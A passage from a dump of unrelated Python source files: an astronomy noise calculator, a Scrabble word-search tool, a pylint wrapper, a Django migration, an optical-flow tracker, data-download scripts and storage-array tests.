f = interpolate.InterpolatedUnivariateSpline(freq, temp, k=1) #linear interpolation of "temp" vs. "freq"
step_size = 1.5e5 #characterize the level of details wanted from interpolation
#decreasing "step_size" can lose smoothness of plot and increasing "step_size" lengthens calculation time
c = const.h * const.k * step_size #constants come from equation 2.15 in Denny(without the radical) and "step_size" is the increment of the Riemann sum
int_range = np.zeros((len(freq), 2)) #create 2 by (length of frequency range) array full of 0's to be replaced with values
int_range_length = freq/2/resol #2nd term in integration bounds from equation 2.15 in Denny
int_range[:,0]=freq - int_range_length #fill up 1st column of 0's array with bottom integration bound from equation 2.15 in Denny
int_range[:,1]=freq + int_range_length #fill up 2nd column of 0's array with top integration bound from equation 2.15 in Denny
ranges = (np.arange(*(list(i)+[step_size])) for i in int_range) #"i in int_range" refers to each row(which has a start and end to the integration range)
#for each row, an array is created with values ranging from the starting value to the ending value, in increments of "step_size"
blingAR_squared = np.array([c*np.sum(i*f(i)) for i in ranges]) #"i in ranges" refers to each row(of the bounds plus "step_size") from the array created above
#for each row, each of the 2 bounds is multiplied by its corresponding temperature from the linear interpolation done at the start and then are summed
#summing does the integral for each frequency
#the sum is multiplied by the number of modes, physical constants, and "step_size" which gives the BLING
#the result should be square rooted but, since the BLINGs are to be added in quadrature, the squares of each background's BLING are added up then square rooted
return blingAR_squared
def bling_TME(freq, resol, sigma, mirror_temp, wavelength): #calculates BLING(squared) for "Thermal Mirror Emission"
## What will be done: 1) Calculate emissivity from surface electrical conductivity("sigma") of specific metal
## 1) Calculate effective temperature from emissivity and mirror temperature
## 2) Calculate BLING(squared) from effective temperature
## 1) Calculate emissivity from surface electrical conductivity("sigma") of specific metal
em = [] #create list to be filled with emissivities, depending on wavelength
w_l = wavelength * (1e-6) #convert wavelength from microns to meters
c1 = 16 * np.pi * const.c * const.epsilon / sigma #constants from equation 2.17 in Denny
for i in w_l:
emis = (c1 / i)**.5 #emissivity a function of the radical of the constants divided by wavelength from equation 2.17 in Denny
em.append(emis) #add calculated emissivities to "em" list
em = np.array(em) #turn "em" list into "em" array
## 2) Calculate effective temperature from emissivity and mirror temperature
effective_temp = [] #create list to be filled with effective temperatures
mirror_temp = float(mirror_temp) #ensure "mirror_temp" is a float not an integer
f = interpolate.InterpolatedUnivariateSpline(freq, em, k=1) #linear interpolation of "em" vs. "freq"
c2 = const.h / (const.k * mirror_temp) #a constant from equation 2.20 in Denny
c3 = const.h / const.k #a constant from equation 2.20 in Denny
for i in freq:
denom = np.exp(c2 * i) - 1 #calculate part of the denominator in equation 2.20 in Denny
temp_eff = .5 * f(i) * i * c3 / denom #calculate effective temperature from the product of frequency, corresponding emissivity, constants, and the denominator from equation 2.20 in Denny
#.5 comes from modes=2
effective_temp.append(temp_eff) #add calculated effective temperatures to "effective_temp" list
temp = np.array(effective_temp) #turn "effective_temp" list into "temp" array
## 3) Calculate BLING(squared) from effective temperature
f = interpolate.InterpolatedUnivariateSpline(freq, temp, k=1) #linear interpolation of "temp" vs. "freq"
step_size = 1.5e5 #characterize the level of details wanted from interpolation
#decreasing "step_size" can lose smoothness of plot and increasing "step_size" lengthens calculation time
c = 2 * const.h * const.k * step_size #2 is number of polarization modes, constants come from equation 2.15 in Denny(without the radical) and "step_size" is the increment of the Riemann sum
int_range = np.zeros((len(freq), 2)) #create 2 by (length of frequency range) array full of 0's to be replaced with values
int_range_length = freq/2/resol #2nd term in integration bounds from equation 2.15 in Denny
int_range[:,0]=freq - int_range_length #fill up 1st column of 0's array with bottom integration bound from equation 2.15 in Denny
int_range[:,1]=freq + int_range_length #fill up 2nd column of 0's array with top integration bound from equation 2.15 in Denny
ranges = (np.arange(*(list(i)+[step_size])) for i in int_range) #"i in int_range" refers to each row(which has a start and end to the integration range)
#for each row, an array is created with values ranging from the starting value to the ending value, in increments of "step_size"
blingTME_squared = np.array([c*np.sum(i*f(i)) for i in ranges]) #"i in ranges" refers to each row(of the bounds plus "step_size") from the array created above
#for each row, each of the 2 bounds is multiplied by its corresponding temperature from the linear interpolation done at the start and then are summed
#summing does the integral for each frequency
#the sum is multiplied by the number of modes, physical constants, and "step_size" which gives the BLING
#the result should be square rooted but, since the BLINGs are to be added in quadrature, the squares of each background's BLING are added up then square rooted
return blingTME_squared
def temp_TME(freq, sigma, mirror_temp, wavelength): #calculates antenna temperature for "Thermal Mirror Emission"
## What will be done: 1) Calculate emissivity from surface electrical conductivity("sigma") of specific metal
## 1) Calculate effective temperature from emissivity and mirror temperature
## 1) Calculate emissivity from surface electrical conductivity("sigma") of specific metal
em = [] #create list to be filled with emissivities, depending on wavelength
w_l = wavelength * (1e-6) #convert wavelength from microns to meters
c1 = 16 * np.pi * const.c * const.epsilon / sigma #constants from equation 2.17 in Denny
for i in w_l:
emis = (c1 / i)**.5 #emissivity a function of the radical of the constants divided by wavelength from equation 2.17 in Denny
em.append(emis) #add calculated emissivities to "em" list
em = np.array(em) #turn "em" list into "em" array
## 2) Calculate effective temperature from emissivity and mirror temperature
effective_temp = [] #create list to be filled with effective temperatures
mirror_temp = float(mirror_temp) #ensure "mirror_temp" is a float not an integer
f = interpolate.InterpolatedUnivariateSpline(freq, em, k=1) #linear interpolation of "em" vs. "freq"
c2 = const.h / (const.k * mirror_temp) #a constant from equation 2.20 in Denny
c3 = const.h / const.k #a constant from equation 2.20 in Denny
for i in freq:
denom = np.exp(c2 * i) - 1 #calculate part of the denominator in equation 2.20 in Denny
temp_eff = f(i) * i * c3 / denom #calculate effective temperature from the product of frequency, corresponding emissivity, constants, and the denominator from equation 2.20 in Denny
#.5 comes from modes=2
effective_temp.append(temp_eff) #add calculated effective temperatures to "effective_temp" list
temp = np.array(effective_temp) #turn "effective_temp" list into "temp" array
return temp
def temp_CMB(freq): #calculates antenna temperature for "Cosmic Microwave Background"
## What will be done: 1) Calculate intensity from frequency
## 2) Calculate antenna temperature from intensity
## 1) Calculate intensity from frequency
temp = [] #create list to be filled with calculated temperatures
c1 = const.h / (const.k * const.T) #constants from equation 2.16 in Denny
c2 = 2 * const.h / (const.c ** 2) #constants from equation 2.16 in Denny
for i in freq:
denom = np.exp(c1 * i) - 1 #calculate part of the denominator in equation 2.16 in Denny
intensity = c2 * (i ** 3)/denom #calculate intensity from equation 2.16 in Denny
## 2) Calculate antenna temperature from intensity
antenna_temp = intensity * (const.c ** 2)/(const.k * (i**2)) #calculate antenna temperature from equation 2.7 in Denny
#.5 comes from modes=2
temp.append(antenna_temp) #add calculated temperature to "temp" list
temp = np.array(temp) #turn "temp" list into "temp" array
return temp
def temp_AR(freq, rad): #calculates antenna temperature for "Atmospheric Radiance"
## What will be done: 1) Interpolate radiance vs. frequency
## 2) Calculate antenna temperature from radiance
## 1) Interpolate radiance vs. frequency
rad = rad / (3e6) #radiance files are given in W/cm^2/st/cm^-1 but are converted to W/m^2/st/Hz
rad = interpolate.InterpolatedUnivariateSpline(freq, rad, k=1) #linear interpolation of "rad" vs. "freq"
## 2) Calculate antenna temperature from radiance
temp = [] #create list to be filled with calculated temperatures
for i in freq:
antenna_temp = .5 * rad(i) * (const.c ** 2)/(const.k * (i**2)) #calculate antenna temperature from equation 2.7 in Denny
temp.append(antenna_temp) #add calculated temperature to "temp" list
temp = np.array(temp) #turn "temp" list into "temp" array
return temp
def IT(bling_TOT, ratio, ts): #calculates Integration Time
return np.array((bling_TOT * ratio / ts)**2, dtype='float') #follows equation 4.1 in Denny
def TS(freq, inte, tau, d, resol): #calculates Total Signal
try: assert len(freq)==len(tau) #if the "freq" array is not the same length as the "tau" array, program will say this is an error
except AssertionError:
raise ValueError("The two arrays must have the same length.")
f = interpolate.InterpolatedUnivariateSpline(freq, inte, k=1) #linear interpolation of "inte" vs. "freq"
g = interpolate.InterpolatedUnivariateSpline(freq, tau, k=1) #linear interpolation of "tau" vs. "freq"
resol = float(resol) #ensure "resol" is a float not an integer
inte_resol = 1000.0
step_size = 0.1 * 3 * 10 ** 10 / inte_resol #characterize the level of details wanted from interpolation
c = np.pi*(d/2.0)**2 * step_size #constants come from equation 3.13 in Denny et al and "step_size" is the increment of the Riemann sum
int_range_length = freq/2/resol #2nd term in integration bounds from equation 3.13 in Denny et al
int_range = np.zeros((len(freq), 2)) #create 2 by (length of frequency range) array full of 0's to be replaced with values
int_range[:,0]=freq - int_range_length #fill up 1st column of 0's array with bottom integration bound from equation 3.13 in Denny
int_range[:,1]=freq + int_range_length #fill up 1st column of 0's array with top integration bound from equation 3.13 in Denny
ranges = (np.arange(*(list(i)+[step_size])) for i in int_range) #"i in int_range" refers to each row(which has a start and end to the integration range)
#for each row, an array is created with values ranging from the starting value to the ending value, in increments of "step_size"
ts = np.array([c*np.sum(f(i)*g(i)) for i in ranges]) #"i in ranges" refers to each row(of the bounds plus "step_size") from the array created above
#for each row, each of the 2 bounds is multiplied by the corresponding intensity and transmission functions from the linear interpolation done at the start
#summing does the integral for each frequency
#multiplying by the constants finishes equation 3.13 in Denny et al
return ts
|
994,238 | 828db2a3154304b87c8e4aa357cf3253cf8bac2c | # -*- coding: utf-8 -*-
"""
Created on Fri Feb 19 16:55:54 2016
@author: Administrator
"""
import pandas as pd
import pandas.io.sql as pd_sql
import sqlite3 as sql
df_file = pd.read_csv('CS_table_No2_No4_new.csv',delimiter=";", skip_blank_lines = True,
error_bad_lines=False,encoding='utf8')
df_file = df_file.drop(['STUDENTID','ACADYEAR','CAMPUSID','SEMESTER','CURRIC','CAMPUSNAME','SECTIONGROUP','GRADE'],axis=1)
df_dropDup = df_file.drop_duplicates(['sub_id'], take_last=True)
con = sql.connect("db.sqlite3")
#df = pd.DataFrame({'TestData': [1, 2, 3, 4, 5, 6, 7, 8, 9]}, dtype='float')
pd_sql.to_sql(df_dropDup, "mywebpage_subject", con, index=False)
con.close() |
994,239 | 3fe19b57673195d5c21a6420ef3057fceb6be422 | #! usr/bin/python3
if (__name__ == "__main__"):
from abstract_sniffer import Abstract_Sniffer
import abc
import os
else:
from smellml_modules.abstract_sniffer import Abstract_Sniffer
import abc
import os
class Pylint_Sniffer(Abstract_Sniffer):
CMD = str(f"pylint INFILE")
sniffer_name = "pylint"
def __init__(self):
""" Pylint constructor """
return None
def get_sniffer_name(self):
""" returns the name of the sniffer """
return self.sniffer_name
def parse_output(self, outputfile, directory):
"""
parses the output file and adds to final.csv in directory.
output:
out_dictionary = {
"column x" : value (float or string)
"column y" : value (float or string)
...
"column n" : value (float or string)
}
OR
out_dictionary = {} if no outfile or if empty
"""
out_dictionary = {}
if os.path.exists(outputfile) and \
os.path.getsize(outputfile) > 600: # make sure exists and not empty.
f = open(outputfile)
file = f.readlines()
try:
rating = float(file[-2].split(" ")[6].split("/")[0])
out_dictionary["pylint_rating"] = rating
f.close()
except:
print("something went wrong when parsing pylint")
return out_dictionary
if (__name__ == "__main__"):
pylint_sniff = Pylint_Sniffer()
outfile = pylint_sniff.run_command("faceswap/tools/", "pylint_out2")
outdirectory = os.path.dirname(outfile)
pylint_sniff.parse_output(outfile, outdirectory)
|
994,240 | 1c50195fe10f2bfd18025d05c7055ae9ed2c08ca | import re
import string
import pickle
import itertools as it
from argparse import ArgumentParser
def num_vowels(word):
return len(re.findall("[AEIOU]", word))
def num_consonants(word):
return len(word) - num_vowels(word)
def point_value(word):
points = [
1,
3,
3,
2,
1,
4,
2,
4,
1,
8,
5,
1,
3,
1,
1,
3,
10,
1,
1,
1,
1,
4,
4,
8,
4,
10,
]
return sum(
point * word.count(letter)
for point, letter in zip(points, string.ascii_uppercase)
)
def parse_range(range_):
parsed_ranges = []
for range__ in range_.split(","):
limits = range__.split("-")
if limits[0] == "":
limits[0] = 0
if limits[-1] == "":
limits[-1] = 10 ** 12
limits = [int(lim) for lim in limits]
parsed_ranges.append(range(min(limits), max(limits) + 1))
return lambda x: any(x in range_ for range_ in parsed_ranges)
def clean_pattern(pattern):
"""
"""
if pattern:
good_chars = string.ascii_letters + "?*-[]"
cleaned_pattern = "".join(ch for ch in pattern if ch in good_chars)
else:
cleaned_pattern = ""
return cleaned_pattern.upper()
def sort_pattern(pattern):
"""
"""
token_regex = re.compile("(\\[[A-Z-]*\\]|\\?|[A-Z]|\\*)")
return "".join(sorted(re.split(token_regex, pattern)))
def pattern_to_regex(pattern):
"""
"""
# TODO Smarten this up (on a per-letter basis.)
range_regex = re.compile("(\\?|\\*|\\[[A-Z-]*\\])")
ranges = re.findall(range_regex, pattern)
def range_to_regex(range_):
if range_ == "?":
return "[A-Z]"
elif range_ == "*":
return "[A-Z]*"
else:
return range
ranges = [range_to_regex(range_) for range_ in ranges]
non_ranges = re.sub(range_regex, "", pattern)
def insert_ranges(pat, ranges, positions):
pat_with_ranges = ""
last_pos = 0
for pos, range_ in zip(sorted(positions), ranges):
substr = pat[last_pos:pos]
pat_with_ranges += substr + range_
last_pos = pos
return pat_with_ranges + pat[last_pos:]
if not ranges:
return pattern
else:
patterns = [
insert_ranges(non_ranges, permuted_ranges, pos)
for permuted_ranges in it.permutations(ranges)
for pos in it.product(
range(len(non_ranges) + 1), repeat=len(ranges)
)
]
patterns = list(set(patterns))
return f"({'|'.join(patterns)})"
def search(lexicon, args):
pattern = clean_pattern(args.pattern)
if args.exact:
regex = pattern
regex = re.sub("\?", "[A-Z]", regex)
regex = re.sub("\*", "[A-Z]*", regex)
elif args.subanagram:
pattern = sort_pattern(pattern)
regex = re.sub("\*", "", pattern)
regex = re.sub("(.)", "\\1[A-Z]*", regex)
regex = re.sub("\?", "[A-Z]", regex)
regex = re.sub("^", "[A-Z]*", regex)
else:
pattern = sort_pattern(pattern)
regex = pattern_to_regex(pattern)
regex = f"^{regex}\\b"
matching_words = {
word: values
for word, values in lexicon.items()
if re.match(regex, values["alphagram"])
}
def select(words, field, range_):
if not range_:
return words
if isinstance(range_, str):
in_range = parse_range(range_)
else:
def in_range(val):
return val in range_
return {
word: worddata
for word, worddata in words.items()
if in_range(int(field(worddata)))
}
matching_words = select(
matching_words, lambda word: word["length"], args.length
)
matching_words = select(
matching_words, lambda word: word["vowels"], args.vowels
)
matching_words = select(
matching_words, lambda word: word["consonants"], args.consonants
)
matching_words = select(
matching_words,
lambda word: word["percent_vowels"],
args.percent_vowels,
)
matching_words = select(
matching_words,
lambda word: word["percent_consonants"],
args.percent_consonants,
)
matching_words = select(matching_words, point_value, args.point_value)
return matching_words
def print_results(results, separate=True, long=False):
alphagram = None
for worddata in results.values():
if (
separate
and alphagram is not None
and alphagram != worddata["alphagram"]
):
print()
if long:
print("\t".join(str(v) for v in worddata.values()))
else:
print(
"\t".join(
[
worddata["alphagram"],
worddata["word"],
worddata["definition"],
]
)
)
alphagram = worddata["alphagram"]
def build_parser():
parser = ArgumentParser(description="")
parser.add_argument("-2", action="append_const", dest="length", const=2)
parser.add_argument("-3", action="append_const", dest="length", const=3)
parser.add_argument("-4", action="append_const", dest="length", const=4)
parser.add_argument("-5", action="append_const", dest="length", const=5)
parser.add_argument("-6", action="append_const", dest="length", const=6)
parser.add_argument("-7", action="append_const", dest="length", const=7)
parser.add_argument("-8", action="append_const", dest="length", const=8)
parser.add_argument("-9", action="append_const", dest="length", const=9)
parser.add_argument("-a", "--anagram", action="store_true")
parser.add_argument("-s", "--subanagram", action="store_true")
parser.add_argument("-e", "--exact", action="store_true")
parser.add_argument("-d", "--dict", "--dictionary", default="NWL2018")
parser.add_argument("-l", "--length")
parser.add_argument("-v", "--vowels", "--num-vowels")
parser.add_argument("-c", "--consonants", "--num-consonants")
parser.add_argument("-V", "--percent-vowels", "--pct-vowels")
parser.add_argument("-C", "--percent-consonants", "--pct-consonants")
parser.add_argument("-p", "--probability-order")
parser.add_argument("-P", "--playability-order")
parser.add_argument("--point-value", "--score")
parser.add_argument("--long", action="store_true")
parser.add_argument("--separate", action="store_true")
parser.add_argument("pattern", metavar="PATTERN", nargs="?", default="\\*")
return parser
def __main__():
parser = build_parser()
args = parser.parse_args()
with open(f"dicts/{args.dict}.pickle", "rb") as infile:
words = pickle.load(infile)
results = search(words, args)
print_results(results, separate=args.separate, long=args.long)
if __name__ == "__main__":
__main__()
|
994,241 | 3ff725e4b7ae33726b7ffb23fd2edc6d73eb97c6 | from .async_stream_receiver import AsyncStreamReceiver
from .tcp_stream_receiver import TCPStreamReceiver
class AsyncTCPStreamReceiver(AsyncStreamReceiver, TCPStreamReceiver):
def __init__(self, ip, port, *args, **kwargs):
TCPStreamReceiver.__init__(self, ip, port, *args, **kwargs)
AsyncStreamReceiver.__init__(self, *args, **kwargs)
def _read(self):
return TCPStreamReceiver.read(self)
def _release(self) -> None:
TCPStreamReceiver.release(self)
|
994,242 | c32394ea0af0e7d1c91048ac63b9d323aa58a0d4 | import sys, math
nums = map(int, sys.stdin.readlines()[1:])
gauss = lambda x: (x/2.0)*(1+x)
total = gauss(len(nums)-1)
a = max(nums)
nums.remove(a)
b = max(nums)
nums.remove(b)
if a == b:
cnt = gauss(1 + nums.count(a))
else:
cnt = 1 + nums.count(b)
shit_fmt = lambda x: math.floor(x*100.0)/100.0 # b/c hackerrank is dumb.
print '{:.2f}'.format(shit_fmt(cnt/total)) |
994,243 | f5f181bc7cb377ad166c2eb198b4f39dff4d6c00 | # Generated by Django 3.0.3 on 2020-03-01 18:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rule_based_engine', '0005_auto_20200302_0002'),
]
operations = [
migrations.AlterField(
model_name='camp_rules',
name='schedule_time',
field=models.CharField(choices=[('min_15', 'every 15 min'), ('hour_1', 'every hour'), ('day_1', 'every day')], max_length=20),
),
]
|
994,244 | 1da65c6e632c50db358c4a7e5d540af24f52359b | # -*- coding: utf-8 -*-
from __future__ import division
import math
valor=input('Digite quanto deseja sacar:')
a=20
b=10
c=5
d=2
e=1
j=(valor//a)
r=(valor%a)
if r == 0:
print('a= %.1d'% j)
|
994,245 | 9efca94ef458a8e118c5dce57da1205fbc69ec39 | import os.path
import numpy as np
import pandas as pd
import util
# Query elasticsearch for the items to use for the data set
def download_data(query_body, filename):
query_results = util.es_bulk_query(query_body)
data = []
columns = set()
count = 0
# Fill out the columns
for item in query_results:
# Ignore this item if it only moved tabs and wasn't sold, or if the buyout's too low
if item['_source']['removed'] - item['_source']['last_updated'] <= 10:
continue
# Do basic formatting of the item
i = util.format_item(item['_source'])
if i['price_chaos'] > 2 * util.VALUE_EXALTED or i['price_chaos'] <= 0.0:
continue
row = util.item_to_row(i)
for col in row:
columns.add(col)
data.append(row)
count += 1
if count % 10000 == 0:
print('processed %d results' % count)
print('column count: ', len(columns))
# Format the results into a pandas dataframe
percent_test = 20
n = (len(data) * percent_test)/100
df = pd.DataFrame(data, columns=sorted(columns))
print("Got %d Hits:" % len(data))
print('exporting to csv...')
# Shuffle the data to avoid organization during the ES query
df = df.iloc[np.random.permutation(len(df))]
df.to_csv(filename, index=False, encoding='utf-8')
base_query = {
"query": {
"bool": {
"should": [
#{"match_phrase": {"typeLine": "Assassin Bow"}},
],
"minimum_should_match": 1,
# Don't include magic items, they mess with the typeLine
"must_not": [
{"match": {"frameType": 1}}
],
"must": [
{"script": {
"script": "doc['removed'].value > doc['last_updated'].value && doc['removed'].value > 1480995463"
}
}]
}
}
}
for item_type in util.all_bases:
matches = []
for subtype in util.all_bases[item_type]:
matches.append({"match_phrase": {"typeLine": subtype}})
base_query["query"]["bool"]["should"] = matches
filename = "data/" + item_type.lower().replace(" ", "_") + ".csv"
if not os.path.isfile(filename):
print("==> Fetching data for '%s'" % item_type)
download_data(base_query, filename)
|
994,246 | 18103a4e900919fbc0ad1956eee5fd66bf59b206 | # Generated by Django 2.0.6 on 2018-08-15 01:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Airport',
fields=[
('airport_code', models.CharField(max_length=3, primary_key=True, serialize=False)),
('airport_name', models.CharField(max_length=50)),
('valet_location', models.CharField(max_length=50)),
('minutes_pickup_delay_with_checkin', models.IntegerField(default=0)),
('minutes_pickup_delay_no_checkin', models.IntegerField(default=0)),
('rate_park_day', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_rent_day', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_valet', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_wash', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_detail', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_basic_cleaning_for_sublet', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_itinerary_change_return_to_owner', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_itinerary_change_per_mile_over_30_miles', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_valet_commission_park', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_valet_commission_terminal', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_valet_commission_fueling', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_valet_commission_itinerary_change_return', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_valet_commission_empty_trip', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_tax_1', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_tax_2', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_percent_sublet_paid_to_partner', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_percent_sublet_paid_to_auto_owner', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('promotion_points', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
],
),
migrations.CreateModel(
name='Partner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('partner_name', models.CharField(max_length=50)),
('partner_tax_id', models.CharField(max_length=50)),
('address', models.CharField(max_length=50)),
('primary_number', models.CharField(max_length=50)),
('secondary_number', models.CharField(max_length=50)),
('has_wash', models.BooleanField(default=False)),
('has_detail', models.BooleanField(default=False)),
('partner_since', models.IntegerField(default=2018)),
('cumulative_points', models.IntegerField(default=0)),
('available_points', models.IntegerField(default=0)),
('partner_level', models.CharField(default='BASE', max_length=50)),
('partner_logo', models.ImageField(upload_to='')),
('rate_park_day', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_rent_day', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_valet', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_wash', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_detail', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_basic_cleaning_for_sublet', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_itinerary_change_return_to_owner', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_itinerary_change_per_mile_over_30_miles', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_valet_commission_park', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_valet_commission_terminal', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_valet_commission_fueling', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_valet_commission_itinerary_change_return', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_valet_commission_empty_trip', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_percent_sublet_paid_to_partner', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('rate_percent_sublet_paid_to_auto_owner', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
('airport', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Api.Airport')),
],
),
migrations.CreateModel(
name='Role',
fields=[
('name', models.CharField(max_length=50, primary_key=True, serialize=False)),
('description', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='Token',
fields=[
('token', models.TextField(primary_key=True, serialize=False)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.CharField(max_length=50)),
('password', models.CharField(max_length=50)),
('salt', models.CharField(max_length=50)),
('name', models.CharField(max_length=50)),
('primary_number', models.CharField(max_length=50)),
('secondary_number', models.CharField(max_length=50)),
('address', models.CharField(max_length=50)),
('license_expiration', models.DateField()),
('license_number', models.CharField(max_length=50)),
('license_state', models.CharField(max_length=50)),
('member_since', models.IntegerField(default=2018)),
('cumulative_points', models.IntegerField(default=0)),
('available_points', models.IntegerField(default=0)),
('email_validated', models.BooleanField(default=False)),
('partner', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='Api.Partner')),
],
),
migrations.CreateModel(
name='UserRole',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('role', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Api.Role')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Api.User')),
],
),
migrations.AddField(
model_name='token',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Api.User'),
),
]
|
994,247 | 790c897bfe4d5c28ffc6d8c927b180b7e717f3cb | import numpy as np
import cv2
from constants import *
from utilities import *
# average movement sensitivity
sensitivity = 2.5
class optical_flow_advanced_tracker:
def __init__(self):
self.track_len = 10
self.detect_interval = 5
self.tracks = []
self.cam = cv2.VideoCapture(0)
self.frame_index = 0
self.arm = init_arm()
def start(self):
# main loop
while True:
_ret, frame = self.cam.read()
# flipping the frame to see same side of yours
frame = cv2.flip(frame, 1)
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# copy to show lines on
image_visuals_copy = frame.copy()
# if there are tracking points
if len(self.tracks) > 0:
previous_image_gray, current_image_gray = self.previous_gray, frame_gray
# collect previous points
previous_points = np.float32([tr[-1] for tr in self.tracks]).reshape(-1, 1, 2)
# lucas-kanade to track points between images
# the lucas-kanade parameters can be found under constants
current_points, _st, _err = cv2.calcOpticalFlowPyrLK(previous_image_gray, current_image_gray, previous_points, None, **lk_params_advanced)
# lucas-kanade reversed images - used for tracking lines
previous_points_reversed, _st, _err = cv2.calcOpticalFlowPyrLK(current_image_gray, previous_image_gray, current_points, None, **lk_params_advanced)
# calculate the distance traveled to check if tracked poits are close enough
d = abs(previous_points - previous_points_reversed).reshape(-1, 2).max(-1)
# calculate difference to test for movement
average_moving_distance = (current_points - previous_points).reshape(-1, 2).mean(axis=0)[0]
# moving condition
check_movement(d=average_moving_distance, sensativity=sensitivity, arm=self.arm)
# check if tracked points are close enough
good = d < 1
new_tracks = []
for tr, (x, y), good_flag in zip(self.tracks, current_points.reshape(-1, 2), good):
if not good_flag:
continue
tr.append((x, y))
if len(tr) > self.track_len:
del tr[0]
new_tracks.append(tr)
cv2.circle(image_visuals_copy, (x, y), 2, (0, 255, 0), -1)
self.tracks = new_tracks
cv2.polylines(image_visuals_copy, [np.int32(tr) for tr in self.tracks], False, (0, 255, 0))
# every interval number of frames
if self.frame_index % self.detect_interval == 0:
mask = np.zeros_like(frame_gray)
mask[:] = 255
# circle the collected points
for x, y in [np.int32(tr[-1]) for tr in self.tracks]:
cv2.circle(mask, (x, y), 5, 0, -1)
# collect new points with goodFeaturesToTrack that uses Shi-Tomasi Corner Detector
# that finds N strongest corners in the image
# and adds these points to the track list
points = cv2.goodFeaturesToTrack(frame_gray, mask = mask, **feature_params)
if points is not None:
for x, y in np.float32(points).reshape(-1, 2):
self.tracks.append([(x, y)])
# advance the frame counter
self.frame_index += 1
# save current frame as previous
self.previous_gray = frame_gray
cv2.imshow('lk_track', image_visuals_copy)
if cv2.waitKey(1) & 0xFF == ord("q"):
break
def main():
optical_flow_advanced_tracker().start()
print('Done')
if __name__ == '__main__':
main()
cv2.destroyAllWindows() |
994,248 | 816faa4b2bf15f81a077440778bf7ffda2bbbc33 | # coding=utf-8
# Copyright (c) 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
from unittest import TestCase
from hamcrest import assert_that, equal_to, instance_of, raises
from storops.exception import VNXLunNotMigratingError, VNXLunSyncCompletedError
from storops.vnx.resource.lun import VNXLun
from storops_test.vnx.cli_mock import t_cli, patch_cli
from storops.vnx.enums import VNXMigrationRate
from storops.vnx.resource.migration import VNXMigrationSession
__author__ = 'Cedric Zhuang'
class VNXMigrationSessionTest(TestCase):
@patch_cli
def test_properties(self):
ms = VNXMigrationSession(0, t_cli())
assert_that(ms.source_lu_id, equal_to(0))
assert_that(ms.source_lu_name, equal_to('LUN 0'))
assert_that(ms.dest_lu_id, equal_to(1))
assert_that(ms.dest_lu_name, equal_to('LUN 1'))
assert_that(ms.migration_rate, equal_to(VNXMigrationRate.HIGH))
assert_that(ms.percent_complete, equal_to(50.0))
assert_that(ms.time_remaining, equal_to('0 second(s)'))
assert_that(ms.current_state, equal_to('MIGRATING'))
assert_that(ms.is_migrating, equal_to(True))
assert_that(ms.is_success, equal_to(False))
assert_that(ms.existed, equal_to(True))
@patch_cli
def test_source_lun(self):
ms = VNXMigrationSession(0, t_cli())
lun = ms.source_lun
assert_that(lun, instance_of(VNXLun))
assert_that(lun.get_id(lun), equal_to(ms.source_lu_id))
@patch_cli
def test_destination_lun(self):
ms = VNXMigrationSession(0, t_cli())
lun = ms.destination_lun
assert_that(lun, instance_of(VNXLun))
assert_that(lun.get_id(lun), equal_to(ms.dest_lu_id))
@patch_cli
def test_get_all(self):
ms_list = VNXMigrationSession.get(t_cli())
